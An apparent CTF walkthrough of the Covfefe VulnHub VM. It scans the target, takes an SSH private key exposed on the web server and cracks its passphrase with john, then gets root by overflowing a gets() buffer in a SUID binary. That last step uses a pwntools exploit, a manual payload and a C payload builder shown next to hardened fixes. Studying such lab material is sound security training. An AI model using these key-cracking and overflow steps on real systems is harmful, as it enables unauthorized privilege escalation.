kanyewest CTF

Notes on what I've been studying.

Covfefe: 1 VulnHub Walkthrough

nmap -Pn -sS -sV -p- 192.168.0.35

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4p1 Debian 10 (protocol 2.0)
80/tcp    open  http    nginx 1.10.3
31337/tcp open  http    Werkzeug httpd 0.11.15 (Python 3.5.3)

SSH is open, and HTTP is served on both 80 and 31337.

nikto -h 192.168.0.35

Nothing of interest came back.

gobuster dir -u http://192.168.0.35 -w /usr/share/dirb/wordlists/big.txt -t 50 -q

Nothing of interest here either.

nikto -h http://192.168.0.35:31337

+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 1499600596.267103, size: 70, mtime: 1587808388
+ Entry '/.bashrc' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/.profile' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/taxes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS 
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/id_rsa: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/id_rsa.pub: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ 7935 requests: 12 error(s) and 15 item(s) reported on remote h

Between robots.txt and the private key id_rsa sitting in the exposed .ssh directory, it looks like we can get onto the box over SSH.

Let's check each of these one at a time.

/taxes

Good job! Here is a flag: flag1{make_america_great_again}

That's the first flag.

/.ssh

['id_rsa', 'authorized_keys', 'id_rsa.pub']

/.ssh/id_rsa

Download id_rsa with wget or similar.

chmod 600 id_rsa

ssh refuses identity files that are readable by others, so set the permissions of id_rsa to 600 before using it.

ssh -i id_rsa simon@192.168.0.35

Enter passphrase for key 'id_rsa': 
simon@192.168.0.35: Permission denied (publickey).

The key is passphrase-protected, so extract a crackable hash with ssh2john and run john against it.

# python3 /usr/share/john/ssh2john.py id_rsa > hash.txt

john hash.txt

starwars         (id_rsa)

The passphrase is starwars.

ssh -i id_rsa simon@192.168.0.35

Enter passphrase for key 'id_rsa': 
Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
simon@covfefe:~$ 

Next, look for files with the SUID bit set; such a binary runs with the privileges of its owner (root, for the interesting ones) rather than those of the user who invokes it.

$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/local/bin/read_message
/bin/umount
/bin/su
/bin/mount
/bin/ping

/usr/local/bin/read_message is obviously the odd one out. There is no strings command on the box, so stand up a throwaway HTTP server with python3 to pull the binary down to the local machine for analysis.

simon@covfefe:/tmp$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.0.26 - - [08/Jun/2020 01:47:19] "GET /read_message HTTP/1.1" 200 -

Running the binary under ltrace locally shows that entering Simon makes the strncmp succeed and takes the "authorized" branch (the execve then returns -1 locally, most likely because the target /usr/local/sbin/message does not exist on the analysis machine).

ltrace ./read_message

__libc_start_main(0x5656a690, 1, 0xffddab84, 0x5656a760 <unfinished ...>
puts("What is your name?"What is your name?
)                         = 19
gets(0xffddaab8, 0x695383fc, 0x6e6f6d, 1Simon
)          = 0xffddaab8
strncmp("Simon", "Simon", 5)                       = 0
printf("Hello %s! Here is your message:\n"..., "Simon"Hello Simon! Here is your message:

) = 36
execve(0xffddaacc, 0, 0, 0x695383fc)               = 0xffffffff
+++ exited (status 0) +++
simon@covfefe:/tmp$ /usr/local/bin/read_message
What is your name?
Simon
Hello Simon! Here is your message:

Hi Simon, I hope you like our private messaging system.

I'm really happy with how it worked out!

If you're interested in how it works, I've left a copy of the source code in my home directory.

- Charlie Root

The source code is apparently in root's home directory, so let's have a look. /root itself is readable, and the second flag is in the source.

simon@covfefe:/root$ cat flag.txt
cat: flag.txt: Permission denied
simon@covfefe:/root$ cat read_message.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// You're getting close! Here's another flag:
// flag2{use_the_source_luke}

int main(int argc, char *argv[]) {
    char program[] = "/usr/local/sbin/message";
    char buf[20];
    char authorized[] = "Simon";

    printf("What is your name?\n");
    gets(buf);

    // Only compare first five chars to save precious cycles:
    if (!strncmp(authorized, buf, 5)) {
        printf("Hello %s! Here is your message:\n\n", buf);
        // This is safe as the user can't mess with the binary location:
        execve(program, NULL, NULL);
    } else {
        printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized);
        exit(EXIT_FAILURE);
    }

}
simon@covfefe:/root$ 

When buf starts with Simon (only the first five bytes are compared), the path held in program is passed to execve. If we can overwrite program with /bin/sh, the SUID binary will hand us a root shell.

Playing with the binary locally quickly shows a stack buffer overflow: gets() imposes no bound on buf.

root@kali:~/vulnhub/covfefe_1# ./read_message 
What is your name?
Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Hello Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! Here is your message:

Segmentation fault

buf is 20 bytes, and in this build program sits immediately after it on the stack, so after 20 bytes of padding the next bytes land in program. The NUL that gets() appends terminates the new path, so "/bin/sh" becomes a valid C string for execve. (Where locals end up relative to each other is a compiler decision, not something the source guarantees; it is worth confirming the layout with gdb before relying on it.)

I wrote the exploit below and got a shell with it locally, then pasted the same payload into the binary on the remote box and got a root shell there as well.

from pwn import *

e = ELF('./read_message')
p = process('./read_message')

# buf is 20 bytes and only its first 5 bytes are compared against "Simon".
# Pad to 20 bytes, then the following bytes (plus the NUL that gets() appends)
# overwrite the program[] array that execve() uses.
payload = b'Simon'
payload += b'A' * (20 - len(payload))
payload += b'/bin/sh'

print('payload: ' + payload.decode())
p.sendline(payload)
p.sendline(b'/bin/sh')
p.interactive()

simon@covfefe:/root$ /usr/local/bin/read_message
What is your name?
SimonAAAAAAAAAAAAAAA/bin/sh
Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message:
# whoami
root
# cat /root/flag.txt
You did it! Congratulations, here's the final flag:
flag3{das_bof_meister}
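The overflow exploited above comes down to two defects in read_message.c: an unbounded gets() and a prefix-only strncmp. As an added example (not code from the page or from the Covfefe VM), the following C shows the vulnerable check beside a hardened one, a bounded replacement for gets() that refuses over-long input instead of silently truncating it, and a small payload builder that generalises the exploit to any buffer size and prefix. The 20-byte buffer and the "Simon" prefix come from read_message.c; the function names (authorized_prefix, authorized_exact, read_name, build_payload) are my own.

```c
#include <stdio.h>
#include <string.h>

/* Sizes and strings taken from read_message.c on the page. */
#define NAME_LEN 20
static const char AUTHORIZED[] = "Simon";

/* Vulnerable check, as in read_message.c: only the first five bytes are
 * compared, so any string that starts with "Simon" passes, overflow or not. */
int authorized_prefix(const char *name)
{
    return strncmp(AUTHORIZED, name, 5) == 0;
}

/* Hardened check: the whole string has to match. */
int authorized_exact(const char *name)
{
    return strcmp(AUTHORIZED, name) == 0;
}

/* Hardened replacement for gets(): read at most len-1 bytes, strip the
 * newline, and reject (return 0) any line that did not fit, draining the
 * rest of it so the next read does not see the tail as a new name. */
int read_name(FILE *in, char *buf, size_t len)
{
    if (len == 0 || fgets(buf, (int)len, in) == NULL)
        return 0;
    char *nl = strchr(buf, '\n');
    if (nl) {
        *nl = '\0';
        return 1;
    }
    /* No newline in the buffer: the line was longer than we allow. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    buf[0] = '\0';
    return 0;
}

/* Build the overflow payload used in the walkthrough: the authorized prefix,
 * 'A' padding up to the size of buf, then the replacement program path.
 * gets() appends the terminating NUL, which is what makes the overwritten
 * program[] a valid C string. Returns the payload length, or 0 on error. */
size_t build_payload(char *out, size_t outlen, size_t bufsize,
                     const char *prefix, const char *program)
{
    size_t plen = strlen(prefix), glen = strlen(program);
    if (plen > bufsize || bufsize + glen + 1 > outlen)
        return 0;
    memcpy(out, prefix, plen);
    memset(out + plen, 'A', bufsize - plen);
    memcpy(out + bufsize, program, glen + 1);
    return bufsize + glen;
}

int main(void)
{
    char payload[64];
    size_t n = build_payload(payload, sizeof payload, NAME_LEN, AUTHORIZED, "/bin/sh");
    printf("payload (%zu bytes): %s\n", n, payload);
    printf("prefix check: %d\n", authorized_prefix(payload)); /* 1: accepted */
    printf("exact check:  %d\n", authorized_exact(payload));  /* 0: rejected */
    return 0;
}
```

Build it with `gcc -o demo demo.c && ./demo`. Either fix on its own would have stopped this particular exploit: the exact comparison rejects the padded name, and the bounded reader never lets 27 bytes reach a 20-byte buffer in the first place. The comment in read_message.c that "the user can't mess with the binary location" is only true while program[] is unreachable from user input; keeping the path out of the same stack frame as the input buffer (a string literal passed straight to execve, or a const global) removes that dependency on compiler layout altogether.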